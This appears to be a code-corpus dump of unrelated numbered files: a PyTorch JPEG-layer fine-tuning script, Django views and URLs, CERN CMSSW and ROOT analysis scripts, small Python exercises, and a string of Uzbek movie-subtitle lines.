        input_size = 448
    elif model_name == "densenet":
        """ Densenet
        """
        model_ft = models.densenet121(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        num_ftrs = model_ft.classifier.in_features
        model_ft.classifier = nn.Linear(num_ftrs, num_classes)
        input_size = 448
    elif model_name == "inception":
        """ Inception v3
        Be careful, expects (299,299) sized images and has auxiliary output
        """
        model_ft = models.inception_v3(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        # Handle the auxilary net
        num_ftrs = model_ft.AuxLogits.fc.in_features
        model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)
        # Handle the primary net
        num_ftrs = model_ft.fc.in_features
        model_ft.fc = nn.Linear(num_ftrs,num_classes)
        input_size = 299
    else:
        print("Invalid model name, exiting...")
        exit()
    if add_jpeg_layer:
        # Quant-only training resumes from the CNN-only checkpoint saved
        # by the main script ("model.final").
        if train_quant_only and not train_cnn_only:
            model_ft.load_state_dict(torch.load("model.final"))
        # Prepend the differentiable JPEG compression layer in front of the CNN.
        model_ft = nn.Sequential(JpegLayer( \
            rand_qtable = rand_qtable, cnn_only = train_cnn_only, quality = quality),\
            model_ft)
        set_parameter_requires_grad(model_ft,\
            False, feature_extract,
            train_quant_only, train_cnn_only)
    return model_ft, input_size
# Initialize the model for this run (args/feature_extract come from the
# CLI-parsing section earlier in the file — not visible here).
model_ft, input_size = initialize_model(args.model_name, args.num_classes, feature_extract, args.add_jpeg_layer, args.quant_only, args.cnn_only, args.rand_qtable, args.quality, use_pretrained=True)
# Print the model we just instantiated
print(model_ft)
######################################################################
# Load Data
# ---------
#
# Now that we know what the input size must be, we can initialize the data
# transforms, image datasets, and the dataloaders. Notice, the models were
# pretrained with the hard-coded normalization values, as described
# `here <https://pytorch.org/docs/master/torchvision/models.html>`__.
#
# Data augmentation and normalization for training
# Just normalization for validation
# Data augmentation and normalization for training; just resizing for
# validation. Normalize is commented out — presumably the JpegLayer expects
# raw [0,1] pixel values; confirm.
data_transforms = {
    'train': transforms.Compose([
        transforms.RandomResizedCrop(input_size),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        #transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
    'val': transforms.Compose([
        # NOTE(review): Resize(256) followed by CenterCrop(input_size=448)
        # crops larger than the resized image — confirm intended.
        transforms.Resize(256),
        transforms.CenterCrop(input_size),
        transforms.ToTensor(),
        #transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
}
print("Initializing Datasets and Dataloaders...")
# Create training and validation datasets (expects <data_dir>/train and <data_dir>/val)
image_datasets = {x: datasets.ImageFolder(os.path.join(args.data_dir, x), data_transforms[x]) for x in ['train', 'val']}
# Create training and validation dataloaders
dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=args.batch_size, shuffle=True, num_workers=4) for x in ['train', 'val']}
# Detect if we have a GPU available
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
######################################################################
# Create the Optimizer
# --------------------
#
# Now that the model structure is correct, the final step for finetuning
# and feature extracting is to create an optimizer that only updates the
# desired parameters. Recall that after loading the pretrained model, but
# before reshaping, if ``feature_extract=True`` we manually set all of the
# parameter’s ``.requires_grad`` attributes to False. Then the
# reinitialized layer’s parameters have ``.requires_grad=True`` by
# default. So now we know that *all parameters that have
# .requires_grad=True should be optimized.* Next, we make a list of such
# parameters and input this list to the SGD algorithm constructor.
#
# To verify this, check out the printed parameters to learn. When
# finetuning, this list should be long and include all of the model
# parameters. However, when feature extracting this list should be short
# and only include the weights and biases of the reshaped layers.
#
# Send the model to GPU
model_ft = model_ft.to(device)
# Collect only the parameters that stayed trainable after the freezing logic
# in set_parameter_requires_grad (all of them when finetuning).
params_to_update = [] #model_ft.parameters()
print("Params to learn:")
for name,param in model_ft.named_parameters():
    if param.requires_grad == True:
        params_to_update.append(param)
        print('\t',name)
# When both quant_only and cnn_only are requested there is nothing left to
# train — skip optimizer creation and run evaluation only.
iftrain = not(args.quant_only and args.cnn_only)
if iftrain:
    # Observe that all collected parameters are being optimized
    optimizer_ft = optim.SGD(params_to_update, lr = 0.0005, momentum=0.9)
else:
    optimizer_ft = None
######################################################################
# Run Training and Validation Step
# --------------------------------
#
# Finally, the last step is to setup the loss for the model, then run the
# training and validation function for the set number of epochs. Notice,
# depending on the number of epochs this step may take a while on a CPU.
# Also, the default learning rate is not optimal for all of the models, so
# to achieve maximum accuracy it would be necessary to tune for each model
# separately.
#
# Setup the loss fxn
criterion = nn.CrossEntropyLoss()
# Train and evaluate
model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, optimizer_ft, num_epochs=args.num_epochs, is_inception=(args.model_name=="inception"), train = iftrain)
# Persist the CNN-only fine-tuned weights so a later quant-only run can
# resume from them (initialize_model loads "model.final").
if args.cnn_only == True and iftrain:
    torch.save(model_ft.state_dict(), "model.final")
#print the trained quantization matrix
if args.qtable:
    print('--------- the trained quantize table ---------')
    # The *255 rescaling suggests the table is stored normalized to [0,1];
    # printed here in standard JPEG units. "0.quantize" is the JpegLayer
    # parameter inside the nn.Sequential wrapper.
    for name,param in model_ft.named_parameters():
        if param.requires_grad == True and\
            name == "0.quantize":
            print('Y',param.data[0]*255)
            print('Cb',param.data[1]*255)
            print('Cr',param.data[2]*255)
            break
# Let's visualize feature maps after jpeg layer
def get_activation(name):
    """Build a forward hook that stashes the layer's detached output in the
    module-level `activation` dict under *name*."""
    def _hook(module, inputs, output):
        activation[name] = output.detach()
    return _hook
# Visualize the image before/after the JPEG layer via a forward hook.
if args.add_jpeg_layer:
    activation = {}
    model_ft[0].register_forward_hook(get_activation('0.JpegLayer'))
    data, _ = image_datasets["val"][0]
    # CHW float tensor -> HWC uint8 image for display/saving.
    f1 = data.cpu().data.numpy()
    f1 = (np.transpose(f1,(1,2,0))*255).astype(np.uint8)
    data.unsqueeze_(0)  # add batch dimension in place
    output = model_ft(data.to(device))
    f2 = activation['0.JpegLayer'].squeeze().cpu().data.numpy()
    f2 = (np.transpose(f2, (1,2,0))*255).astype(np.uint8)
    if args.visualize:
        fig, axarr = plt.subplots(2)
        axarr[0].imshow(f1)
        axarr[1].imshow(f2)
        plt.show()
    #save images (psnr is a project-local helper module)
    from psnr import psnr, compressJ, save
    from PIL import Image
    save(f1, "org.bmp")
    save(f2, "myJpeg.jpg")
###############################
##### standard python jpeg ####
###############################
#im = compressJ(f1,"toJpeg.jpg")
#im = np.array(im, np.int16).transpose(2,0,1)
#
##############################
##### psnr ####
##############################
#f1 = np.array(f1,np.int16).transpose(2,0,1)
#f2 = np.array(f2,np.int16).transpose(2,0,1)
#print("compression results!")
#print("PSNR - my jpeg: ", psnr(f2[0],f1[0]))
#print("PSNR - PIL jpeg", psnr(im[0], f1[0]))
#print("PSNR - my vs. PIL", psnr(im[0], f2[0]))
#######################################################################
## Comparison with Model Trained from Scratch
## ------------------------------------------
##
## Just for fun, lets see how the model learns if we do not use transfer
## learning. The performance of finetuning vs. feature extracting depends
## largely on the dataset but in general both transfer learning methods
## produce favorable results in terms of training time and overall accuracy
## versus a model trained from scratch.
##
#
#
## Initialize the non-pretrained version of the model used for this run
#scratch_model,_ = initialize_model(model_name, num_classes, feature_extract=False, use_pretrained=False)
#scratch_model = scratch_model.to(device)
#scratch_optimizer = optim.SGD(scratch_model.parameters(), lr=0.001, momentum=0.9)
#scratch_criterion = nn.CrossEntropyLoss()
#_,scratch_hist = train_model(scratch_model, dataloaders_dict, scratch_criterion, scratch_optimizer, num_epochs=num_epochs, is_inception=(model_name=="inception"))
#
## Plot the training curves of validation accuracy vs. number
## of training epochs for the transfer learning method and
## the model trained from scratch
#ohist = []
#shist = []
#
#ohist = [h.cpu().numpy() for h in hist]
#shist = [h.cpu().numpy() for h in scratch_hist]
#
#plt.title("Validation Accuracy vs. Number of Training Epochs")
#plt.xlabel("Training Epochs")
#plt.ylabel("Validation Accuracy")
#plt.plot(range(1,num_epochs+1),ohist,label="Pretrained")
#plt.plot(range(1,num_epochs+1),shist,label="Scratch")
#plt.ylim((0,1.))
#plt.xticks(np.arange(1, num_epochs+1, 1.0))
#plt.legend()
#plt.show()
#
######################################################################
# Final Thoughts and Where to Go Next
# -----------------------------------
#
# Try running some of the other models and see how good the accuracy gets.
# Also, notice that feature extracting takes less time because in the
# backward pass we do not have to calculate most of the gradients. There
# are many places to go from here. You could:
#
# - Run this code with a harder dataset and see some more benefits of
# transfer learning
# - Using the methods described here, use transfer learning to update a
# different model, perhaps in a new domain (i.e. NLP, audio, etc.)
# - Once you are happy with a model, you can export it as an ONNX model,
# or trace it using the hybrid frontend for more speed and optimization
# opportunities.
#
|
15,624 | b5637d4d7acc66452e3d916b90f5cb3aecc3aa53 | from django.urls import path
from .views import TaskDelete, TaskDetails, TaskList, TaskCreate, TaskUpdate, TaskLogin, UserRegisterPage
from django.contrib.auth.views import LogoutView
# Task-manager URL configuration: auth pages plus task CRUD routes.
urlpatterns = [
    path('login/', TaskLogin.as_view(), name="login"),
    # Send users back to the login page after logging out.
    path('logout/', LogoutView.as_view(next_page='login'), name="logout"),
    path('register/', UserRegisterPage.as_view(), name="register"),
    path('', TaskList.as_view(), name="tasks"),
    path('task/<int:pk>', TaskDetails.as_view(), name="task"),
    path('create-task/', TaskCreate.as_view(), name="create-task"),
    path('task-update/<int:pk>', TaskUpdate.as_view(), name="update-task"),
    path('task-delete/<int:pk>', TaskDelete.as_view(), name="delete-task"),
]
|
15,625 | 36bf016c23832d3f18cf5eb1903f342f54738f4b | # Compares two strings for equality while checking for errors
import sys

from cs50 import get_string


def _require_string(prompt):
    """Prompt for a line of input; exit with status 1 if none is available."""
    text = get_string(prompt)
    if text is None:
        sys.exit(1)
    return text


# Read both strings, then report whether they match exactly.
s = _require_string("s: ")
t = _require_string("t: ")
print("same" if s == t else "different")
|
15,626 | 3c8f6a7edbb8c4aa85e0da10e9fa1a01c784647e | import FWCore.ParameterSet.Config as cms
import os
# One-event CMSSW job whose only task is to print the SiStripDetVOff
# (HV/LV off) summary for the given conditions tag and time window.
process = cms.Process("summary")
# Route all MessageLogger output (down to DEBUG) to stdout only.
process.MessageLogger = cms.Service("MessageLogger",
    cerr = cms.untracked.PSet(
        enable = cms.untracked.bool(False)
    ),
    cout = cms.untracked.PSet(
        enable = cms.untracked.bool(True),
        threshold = cms.untracked.string('DEBUG')
    ),
    debugModules = cms.untracked.vstring('*')
)
# A single dummy event is enough to trigger the analyzer.
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptySource",
    numberEventsInRun = cms.untracked.uint32(1),
    firstRun = cms.untracked.uint32(1)
)
process.load("CondCore.CondDB.CondDB_cfi")
process.load("CalibTracker.SiStripDCS.siStripDetVOffPrinter_cfi")
# Tag and window to inspect. Time format: "YYYY.MM.DD hh:mm:ss" (UTC).
process.siStripDetVOffPrinter.tagName = "SiStripDetVOff_13hourDelay_v1_Validation"
process.siStripDetVOffPrinter.startTime = "2018.08.09 18:20:00"
process.siStripDetVOffPrinter.endTime = "2018.08.09 22:14:00"
# process.DetVOffSummary = cms.EDAnalyzer( "SiStripDetVOffPrinter",
#     process.CondDB,
#     conditionDatabase = cms.string("frontier://FrontierProd/CMS_CONDITIONS"),
#     # Add the tag
#     tagName = cms.string("SiStripDetVOff_1hourDelay_v1_Validation"),
#     # Start and end time
#     # Time format: "2002-01-20 23:59:59.000" (UTC).
#     startTime = cms.string("2018.08.09 18:20:00"),
#     endTime = cms.string("2018.08.09 22:14:00"),
#     # Set output file name. Leave empty if do not want to dump HV/LV counts in a text file.
#     output = cms.string("PerModuleSummary.txt")
# )
process.p = cms.Path(process.siStripDetVOffPrinter)
15,627 | 5129caaefa43942dd5b64167b8c12160b9e1d6cf | '''
Created on 29-06-2014
@author: carriagadad
'''
# some_app/views.py
from django.views.generic import TemplateView
class CreateUserView(TemplateView):
    # Renders the account-creation page.
    template_name = "oclock/create_user.html"

class LoginUserView(TemplateView):
    # Renders the login page.
    template_name = "oclock/login_user.html"

class RegisterUserView(TemplateView):
    # NOTE(review): reuses the login template — looks like a copy/paste
    # leftover; confirm a dedicated register template wasn't intended.
    template_name = "oclock/login_user.html"

class MainView(TemplateView):
    # Renders the main landing page.
    template_name = "oclock/main_page.html"
15,628 | 5a4daac04fe34908d418768a7cec5bbc75fa76eb | import ROOT
from ROOT import TCanvas, TGraph
from ROOTDefs import get_po_signal_et_background_files
from ROCCurveDefs import create_roc_counter, roc_efficiencies_from_cuts
from tqdm import tqdm
import numpy as np

'''
Manually "train" weights to minimize the background efficiency at 90% signal efficiency. Not using a neural network
module because they cannot train on this directly.
'''

c1 = TCanvas("c1", "Graph Draw Options", 200, 10, 600, 400)

tsig, fsig, tback, fback = get_po_signal_et_background_files()

netcuts = 100
init_weights = [1, 1, 1, 1, 1]
# Scan the layer-0 weight over 0.0 .. 2.0 in steps of 0.1 (21 points).
l0_weight_range = [i*0.1 for i in range(21)]
efficiencies = []
print(l0_weight_range)

for l0_weight in tqdm(l0_weight_range):
    new_weights = [l0_weight, 1, 1, 1, 1]
    tsig.set_reco_et_layer_weights(new_weights)
    tback.set_reco_et_layer_weights(new_weights)

    sig_cuts = create_roc_counter(tsig, netcuts, -20, 100, 0)
    back_cuts = create_roc_counter(tback, netcuts, -20, 100, 0)
    sig_eff, back_eff = roc_efficiencies_from_cuts(sig_cuts, back_cuts)

    # Record the background efficiency at the first cut where the signal
    # efficiency drops below 90%.
    for i in range(netcuts):
        if sig_eff[i] < 0.9:
            print(l0_weight)
            print(back_eff[i])
            efficiencies.append(back_eff[i])
            break

l0_weight_range = np.array(l0_weight_range, dtype=float)
efficiencies = np.array(efficiencies, dtype=float)

# BUG FIX: the graph was built with a hard-coded 11 points while the scan
# produces 21 weights, silently dropping half the results. Also guard the
# case where a weight's scan never crosses the 90% threshold, which leaves
# `efficiencies` shorter than `l0_weight_range`.
n_points = min(len(l0_weight_range), len(efficiencies))
gr = TGraph(n_points, l0_weight_range, efficiencies)
gr.SetTitle('Background Efficiency (@ 90% Signal Efficiency) vs. L0 Weights')
gr.GetXaxis().SetTitle('L0 Weight')
gr.GetYaxis().SetTitle('Background Eff')
gr.Draw('A*')
c1.Print('ManualTester0-2.pdf')
15,629 | 5b918f95f8d408b9f6478bbd6f976c62a5685c92 | from django import forms
from .models import AD, Service_center, Report_problem
class ADForm(forms.ModelForm):
    """Create/edit form for AD (advertisement) entries."""
    class Meta:
        model = AD
        fields = ['name', 'phone', 'content']

class Service_center_Form(forms.ModelForm):
    """Create/edit form for service-center entries."""
    class Meta:
        model = Service_center
        fields = ['name', 'phone', 'content']

class Report_problem_Form(forms.ModelForm):
    """Form for reporting a problem (predefined reason plus free text)."""
    class Meta:
        model = Report_problem
        fields = ['reason', 'other_reason']
|
15,630 | 1e3e0d701d69f22319a5eebd5af68e8f3fe45795 | from django.contrib.auth.views import LoginView, auth_login
from django.shortcuts import render, redirect
from django.views.generic.base import logger
from .forms import *
# Create your views here.
# Public site pages — each view renders its template with an empty context.
def index(request):
    return render(request, 'index.html', {})

def login_index(request):
    return render(request, 'login_index.html', {})

def about(request):
    return render(request, 'about.html', {})

def accomodation(request):
    # NOTE(review): function name misspells "accommodation" (the template is
    # spelled correctly) — renaming would break URLconf references, left as-is.
    return render(request, 'accommodation.html', {})

def blog(request):
    return render(request, 'blog.html', {})

def blogsingle(request):
    return render(request, 'blog-single.html', {})

def contact(request):
    return render(request, 'contact.html', {})

def elements(request):
    return render(request, 'elements.html', {})

def gallery(request):
    return render(request, 'gallery.html', {})
class CustomLoginView(LoginView):
    """
    Custom login view: staff users are redirected past the login form and,
    on successful login, routed to 2FA enrolment.
    """
    form_class = LoginForm
    template_name = 'HotelsApp/account/login.html'
    def get(self, request, *args, **kwargs):
        # Already-authenticated staff skip the login form and go straight
        # to the requested page (or the default landing page).
        if self.request.user.is_authenticated and self.request.user.is_staff: # and has_2fa(self.request):
            return redirect('{}'.format(self.request.GET.get('next', 'HotelsApp:login_index')))
        return super(CustomLoginView, self).get(request, *args, **kwargs)
    def form_valid(self, form):
        # NOTE(review): before auth_login runs, self.request.user is normally
        # anonymous — confirm this staff check ever fires as intended.
        if self.request.user.is_staff: # and not has_2fa(self.request):
            logger.info('is staff but does not have 2FA, redirecting to Authority account creator')
            auth_login(self.request, form.get_user(), backend='django.contrib.auth.backends.ModelBackend')
            return redirect('2fa_register')
        return super(CustomLoginView, self).form_valid(form)
# Account-related pages — template-only renders (Django's auth views and
# URLconf handle the actual password-reset logic).
def user_profile(request):
    return render(request, 'HotelsApp/account/user_profile.html', {})

def login(request):
    return render(request, 'HotelsApp/account/login.html', {})

def logout(request):
    return render(request, 'HotelsApp/account/logged_out.html', {})

def password_reset_complete(request):
    return render(request, 'HotelsApp/account/password_reset_complete.html', {})

def password_reset_confirm(request):
    return render(request, 'HotelsApp/account/password_reset_confirm.html', {})

def password_reset_done(request):
    return render(request, 'HotelsApp/account/password_reset_done.html', {})

def password_reset_email(request):
    return render(request, 'HotelsApp/account/password_reset_email.html', {})

def password_reset_form(request):
    return render(request, 'HotelsApp/account/password_reset_form.html', {})
15,631 | 3bfeae601422c7e48ddb769cb634463dc325b9a6 | """Check module for build type."""
# Official Libraries
from argparse import Namespace
# My Modules
from stobu.types.build import BuildType
__all__ = (
'has_build_of',
)
# Main
def has_build_of(args: Namespace, build: BuildType) -> bool:
    """Return the CLI flag on *args* corresponding to *build* (False for
    unknown build types)."""
    assert isinstance(args, Namespace)
    assert isinstance(build, BuildType)

    # Each build type maps to the argparse attribute that enables it.
    flag_attr = {
        BuildType.NOVEL: 'novel',
        BuildType.OUTLINE: 'outline',
        BuildType.PLOT: 'plot',
        BuildType.SCRIPT: 'script',
        BuildType.STRUCT: 'struct',
        BuildType.SCENE_INFO: 'info',
        BuildType.STATUS_INFO: 'status',
    }.get(build)
    return getattr(args, flag_attr) if flag_attr is not None else False
|
15,632 | b49115a8d12d0120c51def139347844d21348fe6 | Following PEP 8 styling guideline.
A simple way to select a random item from a `list/tuple` data structure
Get the most out of `float`s
Looping techniques
`weakref` callbacks |
15,633 | c30f216bb5426d4ef20300e1f0df83bb1a1baa24 | listMat = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
# Print the 3x4 matrix: a blank line before each row, cells separated
# (and trailed) by tabs — exactly mirroring the original output.
for row_values in listMat:
    print()
    for cell in row_values:
        print(cell, end="\t")
|
15,634 | 7a92f7072f6b5ce618cceabeaa6d4c02a239054e | # 10.03.2020 @odnaks
# Read n integers and print the total amount required to raise every
# element up to the maximum element.
# FIXES: the original shadowed the builtins `str`, `max`, and `sum`, and
# re-implemented max/sum with manual loops; behavior is unchanged.
n = int(input())
tokens = input().split()
values = [int(tokens[i]) for i in range(n)]  # only the first n tokens, as before
largest = max(values) if values else 0       # original printed 0 for n == 0
print(sum(largest - v for v in values))
|
15,635 | c46fe919b77bd6a4b1781169597325d5148b4ab8 | t = int(input())
# Greedy matching: every value in b must be covered by some slot a[j] with
# a[j] <= value <= a[j] + t, each slot usable once. (t is read just above.)
n = int(input())
a = list(map(int, input().split()))
m = int(input())
b = list(map(int, input().split()))
if m > n:
    # More values to place than available slots — impossible.
    print('no')
else:
    for i in b:
        temp = True  # stays True if no slot covers this value
        for j in a:
            if j <= i <= j + t:
                # Consume the first matching slot (first-fit; break right
                # after the remove, so mutating `a` mid-iteration is safe).
                # NOTE(review): first-fit greediness can reject inputs a
                # different assignment would accept — confirm acceptable.
                a.remove(j)
                temp = False
                break
        if temp:
            print('no')
            exit()
    print('yes')
def is_triplet(t):
    """Return True iff t = (a, b, c) is strictly increasing, Pythagorean,
    and sums to 1000."""
    a, b, c = t
    ordered = a < b < c
    return ordered and a * a + b * b == c * c and a + b + c == 1000
from itertools import combinations

# Project-Euler-style search: find the Pythagorean triplet summing to 1000,
# with each component restricted to 200..499.
a = combinations(range(200, 500), 3)
a = filter(is_triplet, a)
a = next(a)  # raises StopIteration if no triplet exists in the range
print(a, sum(a))
15,637 | 2d1225f46b0ac7b30482ac12818fba9c70293f96 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from os.path import abspath, dirname, join, exists
from slugify import slugify
from subprocess import call, PIPE
import sys
# Directory that holds the generated article drafts.
THIS_DIR = abspath(dirname(__file__))
CONTENT_DIR = join(THIS_DIR, 'articles', 'content')
# Metadata header stub written at the top of every new draft.
ARTICLE_HEADER = '''\
Title: {title}
Date: {date}
Author: markos
Category:
Slug: {slug}
Status: draft
Tags:
'''
# Editor command used to open the freshly created draft.
EDITOR = '/usr/local/bin/macdown'
def create_slug(title, dir):
    """Derive a unique slug and target filename for *title* inside *dir*.

    Appends -1, -2, ... to the slug while a file with that name exists.
    Returns (slug, filename).
    """
    # BUG FIX: the directory argument was ignored and paths were always
    # built from the module-level CONTENT_DIR. Use the parameter instead
    # (behavior unchanged for the existing caller, which passes CONTENT_DIR).
    slug = base_slug = slugify(title)
    filename = join(dir, slug + '.md')
    count = 1
    while exists(filename):
        slug = "{0}-{1}".format(base_slug, count)
        filename = join(dir, slug + '.md')
        count += 1
    return (slug, filename)
def create_draft(filename, metadata):
    """Write a new draft file containing only the formatted metadata header."""
    with open(filename, 'w') as fh:
        fh.write(ARTICLE_HEADER.format(**metadata))
def open_editor(filename):
    """Open *filename* in the configured editor (blocking call)."""
    # HARDENING: pass an argv list instead of interpolating into a shell
    # string — filenames containing spaces or shell metacharacters no longer
    # break (or inject into) the command.
    call([EDITOR, filename], stdout=PIPE)
def main(title):
    """Create a dated draft article for `title` and open it in the editor."""
    now = datetime.now()
    # "YYYY-MM-DD HH:MM:SS" -- ISO timestamp without the 'T' and microseconds.
    date = now.isoformat().replace("T", " ").split(".")[0]
    metadata = {
        'title': title,
        'date': date
    }
    slug, filename = create_slug(title, CONTENT_DIR)
    metadata['slug'] = slug
    create_draft(filename, metadata)
    open_editor(filename)
if __name__ == '__main__':
    if len(sys.argv) != 2:
        # Parenthesized print is valid under both Python 2 and Python 3;
        # the original bare print statement was Python-2-only.
        print('You have to pass title of the article as first parameter')
        sys.exit(1)
    title = sys.argv[1]
    main(title)
|
15,638 | 908510f5b469f6e4e61cb8bc2df778f84428a4f4 | a = """To'g'ri, bu unchalik o'xshamasligi mumkin, lekin bu ho'l tosh to'plami
bir nechta kutilmagan hodisalar
faqat ojizlar uchun emas
holsiz
Ko'ryapsizmi, ko'pchilik odamlar chayqalish yoki igna chizish kabi sevimli mashg'ulotlaridan qayerda zavqlanishadi, biz ajdaho poygasini afzal ko'ramiz
odamlar
ajdaho poygasi deb atashni yoqtiradigan kichik narsa
u bu erda hidlay boshlaydi
hidi
Yo'q, hali ham sizni yomon ko'raman.
bu joyni puflaylik
puflamoq
katta gap uni qo'rqitdi, to'g'rimi?
u sizni tiriklayin ko'mishga harakat qilmadimi?
faqat bir necha soat
endi, ajdaho bu erda biroz muammo bo'lgan, lekin bu besh yil oldin bo'lgan
va, albatta, nima uchun ular unday emas
bizda maxsus otxonalar bor, siz hamma ovqatlantiradigan joylarni eyishingiz mumkin, ajdarni to'liq yuvish xizmati
hatto yong'inning oldini olish, agar men buni o'zim aytgan bo'lsam
biz hali ham bu narsani yuta olamiz
yuqoriga
Mana, azizim
mendan boshqa
butun shon -shuhratimni o'g'irlashga urinishni bas qiling
har doim hamma narsani buzadi
bu mening bo'lajak kelinim
berk deyarli mukammaldir
barcha mehnatim o'z samarasini berdi
dunyo shunchaki kattalashib ketdi
Siz bunga boshqa zarba bermoqchimisiz
bu ajoyib
endi hayratlanarli emas
bu haqiqatan ham hech qaerdan paydo bo'lmagan
biz u erda sizning yakkaxon sayohatingiz ustida ishlashimiz kerak
yakkaxon
sirg'alish
qulflangan dumi qutqarish manevralarini juda beparvo qiladi
kechirim istaysizmi
shuning uchun ham sen shivirlayapsan, katta chaqaloq
Xo'sh, buni sinab ko'ring
Oh, siz hali ham buni his qilyapsizmi?
butun qalbimdan pushaymon bo'ldimmi?
va xunuk
Bilasizmi, bu yuvilmaydi
nima deb o'ylaysiz?
g'alati shivirlab o'lim yoki toshlar ichida
pichirlash
Balki, biz nihoyat boshqa Night Furyni kuzatib boramiz
bu narsa emasmi?
hech narsa bo'lmaydi
faqat davom eting
yana nima
otamdan qochish
sen buni yaxshi ko'rasan
uyingizda dahshatli dahshatlar kuylayapti
Men nonushta qilyapman, dunyo bilan hamma narsa to'g'ri deb o'ylayman, va men tushunaman
Boshlash uchun men kun bo'yi xafa bo'ldim
bu haqiqatan ham xushomadgo'ylik
sen Berkning faxrisan, o'g'lim
men ham o'zimdan juda ta'sirlandim
va hech bir boshliq yaxshiroq voris so'rashga qodir emas edi
qaror qildim
sezgir
bu katta mas'uliyat
Bu so'zlar, qishloqni rejalashtirish va boshqarish - bu uning ishi
Menimcha, siz bu fikrni yo'qotdingiz
qanday sharaf
juda hayajonlangan bo'lardim
men hali ham qidiraman
Men otam emasligimni bilaman
bu meni nima qiladi
yaqin turing
hushyor bo'ling
quyruqni tomosha qiling
quyruq
oyoqlarini yuqoriga bog'lab qo'ying
ularning hammasi birdaniga ketdi deb o'yladim
Bizning omadimiz yaxshi tomonga burilganga o'xshaydi, yigitlar
Qarang, biz hech qanday muammoni xohlamaymiz
portlatilgan
tuzoq
yashirincha
qutqarish
siz kechagi o'g'ri do'stingizdan boshqasini nazarda tutyapsizmi?
muz tupurish
lekin bizda hali to'ldirish uchun kvota bor
Sizningcha, bu tartibsizlikni drago Bludvistga qanday tushuntiramiz
siz aytgan biror narsa mantiqiymi?
u ertaga o'z qo'shini uchun ajdarlarning yangi partiyasini kutmoqda
va Drago uzr so'ramaydi
va'da qildi
ancha kam
biz ajdaho o'g'ri haqida hech narsa bilmaymiz
g'alati
dushman
Oh, mening odobim qani
eng yaxshi ajdaho tuzoqchi tirik
qo'lga olish
shoshiling, yigitlar
siz hech qachon bu ajdarlarni ushlab turmaysiz
ehtimol u hozirgacha dunyoning chetidan uchib ketgan
Siz o'sha bolaning qishloqni boshqarishini xohlaysiz
siz hali ham pensiyani kechiktirishingiz mumkin
kim nihoyat ishga chiqishga qaror qildi
Kechirasiz, ushlab turdim
Menga aytmoqchi bo'lgan narsa?
Siz o'ylayotgan narsa unchalik emas, lekin ha
birinchi vazifasi o'z xalqi oldida
Xo'sh, biz faqat yolg'iz gaplasha olamizmi?
Hey, men sizdan oldinda edim
agar gaplasha olsak
Men baland pog'onali va katta saqlash joyiga ega yuqori o'rindiqlardan birini xohlayman
ota, bu aslida egar yasashdan ko'ra muhimroq
xalqingizga xizmat qilish borasida hech qanday vazifa juda kichik emas
siz qurbonning yana o'lishiga yo'l qo'ydingiz
siz asrab olmoqchisiz
uzoqlashing
Men sizga haqiqatan ham biz uchrashgan yangi er haqida aytib berishim kerak
biz bilish uchun atrofga yopishmadik
Bu odamlar, ayniqsa, do'stona emas edilar
Sizning Night Fury va Deadly Nadder ularni olib kelmadi
tomlarning tepasida
tepaliklar
bu bolalar tuzoqchi edi
siz ularning qal'asini ko'rishingiz kerak edi
g'alati edi
va eng yomoni, ular biz buni qildik deb o'yladilar
hamma ham bu hayot tarzini qadrlamaydi
eng yaxshisi o'zimizniki.
bundan tashqari, siz o'z vaqtingizni yanada muhimroq ishlatasiz
bir marta biz katta e'lon qilamiz
agar u ajdarimni olmoqchi bo'lsa, men uning mushtini yuzim bilan qonga to'kaman
siz shunchalik ahmoqsiz
eshiklarni muhrlab qo'ying
bo'ron eshiklarini pastga tushiring
kuting, chunki siz bilgan bir yigit uzoq mamlakatda muammo tug'dirmoqda
chunki Drago Bludvist vijdonsiz yoki rahm -shafqatsiz jinnidir
ularni qalamlariga joylashtiring
keyin u erga qaytamiz
biz orolni mustahkamlaymiz
tinchlikni saqlash bizning burchimiz
tinchlik tugadi
Men sizni urushga tayyorlashim kerak
aql
otxonalarni mustahkamlang
har bir do'konni mahkamlang
Men .. Kerak
ko'zingizni yuming, bolalar
Bu shamol bilan biz Dragonga tong otguncha etib boramiz
Yaxshisi, biz bu kemani ajdarlarga to'ldiramiz va tezda
halol bo'lish vaqti emas
port choragidan tashqarida
ularga to'r, yigitlar
ularni pastga tushiring
chap tomonda
va men bo'sh qoldik, deb qo'rqardim
taslim bo'lamiz
eng zo'r
Bu xo'jayinni xursand qilishi kerak
bizni kechir
ajdarlar chayqalgan joylarga unchalik ahamiyat bermaydilar
ular faqat sen bilan uchrashishadi
muammo
Agar siz yog'ochdan yasalgan qayiqlarni qilmasangiz, qanday qilib sizning suzishingiz qurolli mahbuslarga ega bo'lolmaydi, ular sizni o'zlaridan biri sifatida ko'rsalar, hatto eng mazali ajdarlarni ham o'rgatish mumkin.
u haqiqatan ham ishontira oladi
Agar siz uning sadoqatini qo'lga kiritgan bo'lsangiz, ajdaho siz uchun hech narsa qilmaydi
qarang, men qanchalik yaxshi himoya qilaman va ta'minlayman
hamma to'rlar bilan nima bor?
yaqin
olovingizni ushlab turing
biz sizni qutqarish uchun keldik
yetarli
Xo'sh, siz noto'g'ri kemani tanlamadingizmi?
bu narsani mendan oling
men buni tushundim
egarlang
hamma mas'uliyatsizlikdan
Men ajdarlarimizni himoya qilishga va urushni to'xtatishga harakat qilaman
qanday qilib bu mas'uliyatsizlik
biz hammamiz duch kelgan ajdaho balosini muhokama qilish uchun boshliqlarning katta yig'ilishi bo'lib o'tdi
bizning oramizga begona erdan, izlari bilan qoplangan va ajdaho terisiga burkangan begona keldi.
izlar
taralgan
plash
u qo'lida qurol yo'q edi va ohista gapirdi
insoniyatni ajdarlarning zulmidan ozod qilishga bag'ishlangan
biz ta'zim qilib, unga ergashishni tanladik
biz ham kulib yubordik
qadar
